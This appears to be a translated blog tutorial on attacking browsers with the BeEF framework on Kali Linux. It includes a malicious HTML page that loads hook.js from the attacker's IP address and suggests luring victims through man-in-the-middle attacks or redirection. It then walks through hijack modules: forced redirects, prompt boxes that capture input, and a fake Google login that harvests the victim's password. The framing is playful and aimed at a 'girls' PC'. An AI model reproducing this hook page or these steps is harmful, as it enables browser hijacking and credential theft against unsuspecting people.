.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
Environmental description:
kali linux(192.168.0.114) Heikuidi device win7 (192.168.0.113) Girls' pc
Meet beef
BEEF (The Browser Exploitation Framework): A browser attack framework developed in Ruby language, a module installed by default in Kali, used to implement attacks and exploitation of XSS vulnerabilities.
BeEF mainly inserts a JS script code called hook.js into the web page. If the browser visits a page with hook.js (hook), it will be hooked (hooked). The hooked browser will execute the initial code to return some information. Then the target host will send a request to the BeEF server every once in a while (default is 1 second), asking whether there is new code to be executed. BeEF servers are essentially like web applications, divided into front-end and back-end. The front-end will poll the back-end whether there is new data that needs to be updated. At the same time, the front-end can also send instructions to the back-end. BeEF holders can log in to the back-end of BeEF through the browser to control the front-end (user's browser). BeEF is generally used in conjunction with XSS vulnerabilities.
Start BEEF
Method 1: Click the icon in the column to start.
Method 2: Execute the command beef-xss
Kali has already made beef-xss a service, and we can also use the systemctl command to start or close the beef service
systemctl start beef-xss.service #Enable beef service
systemctl stop beef-xss.service #Close beef service
systemctl restart beef-xss.service #Restart beef service Note: The initial configuration requires us to enter our account and password (set it yourself)
After startup is completed, it will automatically jump to the browser's management page. Enter the account number and password we just set and log in to the system. The initial account and password are beef
Configure our hooks
There are two methods to briefly talk about here:
Method 1: Find a website containing xss vulnerability and insert js to achieve the attack target.
Method 2: Write a poisonous web page yourself for others to visit. (Internal network + external network)
Here we take Method 2 as the column: write a simple page.
!doctype html
html
head
meta charset='utf-8'
title la la la la la la la la la/title
/head
Body
h1bbskali.cn/h1
script src='http://192.168.0.114:3000/hook.js'/script
/body
/html
In other words, find a way to get others to visit the page I just wrote. You can achieve the target of the attack. There are many methods, such as man-in-the-middle attack, redirection, black page hanging, etc.
Attack Demo
Demo 1 (device online)
When the attack side visits our web page, we can see the online device in the beef console.
Device Attack
Click on our device and select the commands tab. We can see that there are many attack modules.
Readers may find that there is a small circle logo with color (green, gray, orange, red) in front of each module.
Internally, BeEF can detect which command modules can work in the currently victimized browser and indicate in color:
Green: The command module can run on the target browser, and the user will not feel any abnormalities.
Orange: The command module can run on the target browser, but the user may feel abnormal (such as pop-ups, prompts, jumps, etc.)
Gray: The command module has not been verified for this target, i.e. it is not known whether it can be run.
Red: The command module does not work for this target
Here are a few modules for you. Everyone else entertains themselves!
Let the browser automatically access the specified website
Click Browser--hooked Doman--Redirect Browser Enter our target URL and click Execute to complete the attack. Return to the page I just opened and found that I automatically jumped to the kali forum.
Pop up dialog box
Click Browser--hooked Doman --Create Alert Dialog to enter the information we want to pop up and click Execute to complete the attack.
The effect is as follows
Popt the input information box
Click Browser--hooked Doman --Create Prompt Dialog to enter the information we want to pop up and click Execute to complete the attack.
In the same way, after we enter the information, we can see the information we just entered in the management panel!
Results
Make a phishing website
Select Scoial Engineering--Google phishing to our kali ip address. Click Execute
Our page has become Google's login page
Enter our account number and password
Password obtained